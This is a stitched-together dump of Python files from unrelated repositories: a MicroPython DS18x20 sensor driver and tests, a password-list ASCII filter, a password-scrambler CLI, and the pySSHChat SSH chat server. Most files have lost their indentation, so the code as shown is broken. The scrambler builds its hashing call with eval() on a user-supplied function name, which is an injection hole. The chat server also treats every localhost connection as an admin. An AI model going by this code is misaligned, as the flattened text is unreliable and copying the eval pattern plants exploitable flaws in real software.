Read and return the temperatures of all attached DS18x20 devices.
"""
temps = []
for rom in self.roms:
temps.append(self.read_temp(rom))
return temps
def convert_temp(self, rom0, data):
"""
Convert the raw temperature data into degrees celsius and return as a float.
"""
temp_lsb = data[0]
temp_msb = data[1]
if rom0 == 0x10:
if temp_msb != 0:
# convert negative number
temp_read = temp_lsb >> 1 | 0x80 # truncate bit 0 by shifting, fill high bit with 1.
temp_read = -((~temp_read + 1) & 0xff) # now convert from two's complement
else:
temp_read = temp_lsb >> 1 # truncate bit 0 by shifting
count_remain = data[6]
count_per_c = data[7]
temp = temp_read - 0.25 + (count_per_c - count_remain) / count_per_c
return temp
elif rom0 == 0x28:
temp = (temp_msb << 8 | temp_lsb) / 16
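            # e.g. the DS18B20 datasheet value 0x0191 (= 401) yields 401 / 16 = 25.0625 degrees C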
if (temp_msb & 0xf8) == 0xf8: # for negative temperature
temp -= 0x1000
return temp
else:
assert False
```
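A minimal usage sketch for the driver above (not part of the repository; the GPIO number and the `machine.Pin` import are assumptions for a generic MicroPython board):
```python
# Hypothetical example: poll DS18x20 sensors on GPIO 4 once per second.
import time
from machine import Pin
from ds18x20 import DS18X20

ds = DS18X20(Pin(4))             # scan the 1-wire bus for DS18S20/DS18B20 ROMs
print("found sensors:", ds.roms)
while True:
    print(ds.read_temps())       # list of temperatures in degrees Celsius
    time.sleep(1)
```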
#### File: tests/basics/fun_error2.py
```python
try:
enumerate
except:
print("SKIP")
import sys
sys.exit()
def test_exc(code, exc):
try:
exec(code)
print("no exception")
except exc:
print("right exception")
except:
print("wrong exception")
# function with keyword args not given a specific keyword arg
test_exc("enumerate()", TypeError)
```
#### File: tests/basics/subclass_classmethod.py
```python
class Base:
@classmethod
def foo(cls):
print(cls.__name__)
try:
Base.__name__
except AttributeError:
import sys
print("SKIP")
sys.exit()
class Sub(Base):
pass
Sub.foo()
# overriding a member and accessing it via a classmethod
class A(object):
foo = 0
@classmethod
def bar(cls):
print(cls.foo)
def baz(self):
print(self.foo)
class B(A):
foo = 1
B.bar() # class calling classmethod
B().bar() # instance calling classmethod
B().baz() # instance calling normal method
``` |
{
"source": "84KaliPleXon3/OMEN",
"score": 3
} |
#### File: OMEN/utils/ascii_filter.py
```python
import sys
def is_ascii(s):
return all(((ord(c) >= 32 and ord(c) <= 126) or ord(c) == 0x0A or ord(c) == 0x0D) for c in s)
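# Illustrative examples (not part of the original script):
#   is_ascii('hello\n') -> True
#   is_ascii('h\xe9llo') -> False ('e acute', code point 233, is outside printable ASCII)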
removed_counter = 0
# Open file with universal newlines as binary file
with open(str(sys.argv[1]), 'rbU') as passwordfile:
for line in passwordfile:
# We remove non utf-8 characters from line, e.g., encoding f*ck up
line = line.decode('utf-8', 'ignore') # bytes to string
# Remove newline (Unix '\n', Mac '\r', Windows '\r\n')
line = line.rstrip('\r\n')
# Check if printable ASCII
if is_ascii(line):
#pass
print("{}".format(line))
else:
# If the line is non-ASCII, we print it to standard error (stderr) stream
#line = line.encode('utf-8', 'ignore') # string to bytes
#sys.stderr.write("Removed: {}\n".format(line))
removed_counter = removed_counter + 1
sys.stderr.write("Done. I removed {} lines/non-ASCII passwords.\n".format(removed_counter))
``` |
{
"source": "84KaliPleXon3/password_scrambler",
"score": 3
} |
#### File: 84KaliPleXon3/password_scrambler/passcrambler.py
```python
import sys
import os
import argparse
import getpass
import base64
import hashlib
from Crypto.Cipher import AES
###
# AES:
pad = lambda s: s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size)
def aes_encrypt( seed, key, raw ):
raw = pad(raw)
iv = seed[0:AES.block_size]
cipher = AES.new( key, AES.MODE_CBC, iv )
return base64.b64encode( iv + cipher.encrypt( raw ) )
###
def scramble( key, func='md5' ):
# Ugly but effective, moreover this is not a webapp so who cares.
# Will raise AttributeError if function is not valid ... auto validation FTW!
return eval( 'hashlib.%s(key).digest()' % func )
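# Illustrative example (not part of the original source):
#   scramble('secret', 'sha1') is equivalent to hashlib.sha1('secret').digest()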
###
def convert_to_charset(password, specialchars):
output = ""
i = 0
slen = len(specialchars)
for c in password:
if c.isalnum():
output += c
else:
output += specialchars[i % slen]
i += 1
return output
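# Illustrative example (not part of the original source):
#   convert_to_charset('a/b=c', '_&#') -> 'a_b&c'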
def main():
try:
parser = argparse.ArgumentParser(description="Password scrambler")
parser.add_argument('--file', dest="file", default=None, help="File used to initialize generation", required=True)
parser.add_argument('--login', dest="login", default=None, help="Login for which you want to use the password", required=True)
parser.add_argument('--special', dest="special", default="_&#", help="Whitelist of special characters, i.e: '_&#'")
parser.add_argument('--length', dest="length", default=30, help="Length of the password, default=30", type=int)
parser.add_argument('--scramble-func', dest="func", default='md5', help="Hashing function to use for input data scrambling, default=md5.\nOther functions can be found on hashlib module documentation.")
args = parser.parse_args()
# first thing first, fail if seed file does not exist
with open( args.file, 'rb' ) as fd:
raw = fd.read()
password = <PASSWORD>()
key = scramble( password, args.func )
vec = scramble( args.login, args.func )
aes_out1 = aes_encrypt( vec, key, raw )
sha_digest = hashlib.sha512(aes_out1).digest()
passlen = len(password) % len(sha_digest)
key2 = sha_digest[passlen: passlen+32]
aes_out2 = aes_encrypt( key, key2, aes_out1 )
start = ord(key[0]) % len(aes_out2)
portion = aes_out2[start:]
result = hashlib.sha512(portion).digest()
longpass = base64.b64encode(result)
longpass = longpass[0:args.length]
longpass = convert_to_charset(longpass, sorted(args.special, reverse=True))
print "---"
print longpass
print "---"
except AttributeError:
print "[ERROR] '%s' is not a valid hashing function." % args.func
except Exception as e:
print "[ERROR] %s" % e
if __name__ == "__main__":
main()
``` |
{
"source": "84KaliPleXon3/pySSHChat",
"score": 3
} |
#### File: pySSHChat/pysshchat/__init__.py
```python
import sys
import argparse
import logging
from pysshchat.store import store
from pysshchat.commands import load_commands
from pysshchat.server import Server
logging.basicConfig(level=logging.WARN)
config = store.config
texts = store.texts
server = Server()
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-H", "--host", help="Hostname (default: 127.0.0.1)", nargs="?")
parser.add_argument("-p", "--port", help="Set port listen (default: 2200)", nargs="?", type=int)
parser.add_argument("-k", "--key", help="Host rsa key path (default auto generated in ~/.ssh/pysshchat)", nargs="?")
parser.add_argument("--password", help="Set password for connect to chat (default non-password)", nargs="?")
parser.add_argument("--config", help="Path config.yaml (see pysshchat/yaml/config.yaml)", nargs="?")
parser.add_argument("--set-title", help="Set title chat", nargs="?")
parser.add_argument("--set-help", help="Set help message", nargs="?")
parser.add_argument("--set-help-file", help="Set help message", nargs="?")
parser.add_argument("--load-text", help="Load texts.yaml on path", nargs="?")
parser.add_argument("--only-simply-mode", dest="only_simply_mode", action="store_true", help="Only line mode (without urwid)")
parser.set_defaults(only_simply_mode=False)
args = parser.parse_args()
load_commands()
if args.host:
config["host"] = args.host
if args.port:
config["port"] = args.port
if args.key:
config["host_key"] = args.key
if args.password:
config["password"] = args.password
if args.set_title:
texts["text"]["title"] = args.set_title
if args.set_help:
texts["text"]["help"] = args.set_help
if args.only_simply_mode:
config["only_simply_mode"] = True
if args.set_help_file:
try:
            with open(args.set_help_file, "r", encoding="utf-8") as file:
texts["text"]["help"] = file.read()
except Exception:
print("Error load %s file" % args.set_help)
sys.exit(0)
if args.config:
store.load_config(args.config)
if args.load_text:
store.load_text(args.load_text)
def start():
server.start()
```
#### File: pySSHChat/pysshchat/libs.py
```python
import threading
def create_thread(func, *args, **kwargs):
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
def run_thread(func):
def f(*args, **kwargs):
create_thread(func, *args, **kwargs)
return f
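# Illustrative usage (not part of the original module):
#   @run_thread
#   def worker(arg):
#       ...  # each call to worker() now runs in a background daemon thread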
```
#### File: pySSHChat/pysshchat/server.py
```python
import re
import sys
import os
import asyncio
import asyncssh
import logging
import hashlib
from pathlib import Path
from pysshchat.user.ui import UI
from pysshchat.user.line import Line
from pysshchat.store import store
logging = logging.getLogger("server")
def fingerprint(key):
fp_plain = hashlib.md5(key).hexdigest()
return ":".join(a + b for a, b in zip(fp_plain[::2], fp_plain[1::2]))
def genkey(path):
if not path:
path = "~/.ssh/pysshchat"
key_path = os.path.expanduser(path)
path = Path(key_path)
if not path.is_file():
Path(path.parent).mkdir(parents=True, exist_ok=True)
key = asyncssh.generate_private_key("ssh-rsa")
key.write_private_key(key_path)
print("Generate host key")
# print("Fingerprint MD5:" + fingerprint(key.get_ssh_public_key()))
return key_path
class MyServer(asyncssh.SSHServer):
def connection_made(self, conn):
self._conn = conn
conn.is_admin = False
def begin_auth(self, username):
admins = store.config.get("admin", False)
if admins:
return bool(admins.get(username, False))
def validate_public_key(self, username, key):
user_key = fingerprint(key.get_ssh_public_key())
admin_key = store.config["admin"].get(username, False)
is_auth = user_key == admin_key
if is_auth and not self._conn.is_admin:
self._conn.is_admin = True
return is_auth
def public_key_auth_supported(self):
return True
def connection_lost(self, exc):
username = self._conn.get_extra_info("username")
user = store.users.get(username, None)
if user:
user.exit()
class Server:
loop = asyncio.get_event_loop()
pid = "/tmp/pysshchat.pid"
def __init__(self):
store.server = self
async def handle_client(self, process):
try:
username = process.channel.get_extra_info("username")
ip, port = process.channel.get_extra_info("peername")
process.is_admin = ip == "127.0.0.1" or process._conn.is_admin
if ip in store.bans.values():
return self.error(process, "Sorry, you are banned.")
size_x, size_y, term_x, term_y = process.get_terminal_size()
simple_mode = process.env.get("SIMPLE", None)
normal_mode = True
if size_x < 60 or size_y < 15 or not len(process.env.items()): # for mobile
normal_mode = False
if simple_mode:
normal_mode = simple_mode != "1"
if store.config.get("only_simply_mode", False):
normal_mode = False
username = re.sub("[^\w]", "", username)
if not len(username):
return self.error(process, "Empty username.")
if len(username) > 10:
return self.error(process, "Max username len 10 chars.")
if username in store.users:
return self.error(process, "This username is used.")
password = store.config.get("password")
if password:
process.stdout.write("Password: ")
try:
process.channel.set_echo(False)
line = await process.stdin.readline()
if line.rstrip("\n") != password:
return self.error(process, "Incorrect password")
except:
process.close()
process.channel.set_echo(False)
process.channel.set_line_mode(False)
if not normal_mode:
Line(username, process, self.loop)
else:
UI(username, process, self.loop)
except Exception as e:
logging.exception(e)
def info(self):
host = store.config.get("host", "127.0.0.1")
port = store.config.get("port", 2200)
key = genkey(store.config.get("host_key", "~/.ssh/pysshchat"))
print("Host key file - %s" % key)
print("Listing %s:%s" % (host, port))
return host, port, key
async def start_server(self):
host, port, key = self.info()
await asyncssh.create_server(MyServer, host, port,
server_host_keys=[key],
process_factory=self.handle_client, line_editor=True)
def error(self, process, text):
process.stdout.write(text + "\r\n")
process.close()
def run(self):
try:
self.loop.run_until_complete(self.start_server())
except (OSError, asyncssh.Error) as exc:
sys.exit("Error starting server: " + str(exc))
try:
self.loop.run_forever()
except KeyboardInterrupt:
tasks = [asyncio.ensure_future(user.wait_closed()) for user in store.users.values()]
if len(tasks):
self.loop.run_until_complete(asyncio.wait(tasks))
except Exception as e:
logging.exception(e)
def start(self):
self.run()
```
#### File: user/ui/palette.py
```python
_palette = [
("divider", "black", "dark cyan", "standout"),
("text", "yellow", "default"),
("bold_text", "light gray", "default", "bold"),
("bold", "bold", ""),
("italics", "italics", ""),
("underline", "underline", ""),
("body", "text"),
("footer", "text"),
("header", "text"),
("list", "black", "light gray"),
("msg_info", "black", "dark cyan", "bold"),
("info", "default", "dark cyan", "bold"),
("title", "bold", "dark cyan", "bold"),
("body", "dark cyan", "", ""),
("msg_danger", "black", "dark red", "bold"),
("default", "", "", "")
]
for id in range(255):
_palette.append(("h" + str(id), "", "", "", "h" + str(id), "default"))
def palette():
return _palette
```
#### File: 84KaliPleXon3/pySSHChat/setup.py
```python
import subprocess
from setuptools import setup, find_packages
from os.path import isdir, join, dirname
PREFIX = "2.1.%s"
def get_version():
d = dirname(__file__)
if isdir(".git"):
version = PREFIX % int(subprocess.check_output(["git", "rev-list", "--all", "--count"]))
with open(join(d, ".version"), "w") as f:
f.write(version)
else:
with open(join(d, ".version"), "r") as f:
version = f.read()
return version
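# Illustrative note (not part of the original file): with, say, 345 commits in the
# repository, get_version() returns "2.1.345".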
setup(
name="pySSHChat",
packages=find_packages(),
version=get_version(),
description="SSH chat server written on Python3",
author="LexSerest",
author_email="<EMAIL>",
url="https://github.com/LexSerest/pySSHChat/",
keywords=["ssh", "chat", "ssh chat"],
install_requires=[
"pyyaml",
"asyncssh",
"urwid",
"sty",
"aiohttp"
],
include_package_data=True,
license="MIT",
scripts=['bin/pysshchat']
)
``` |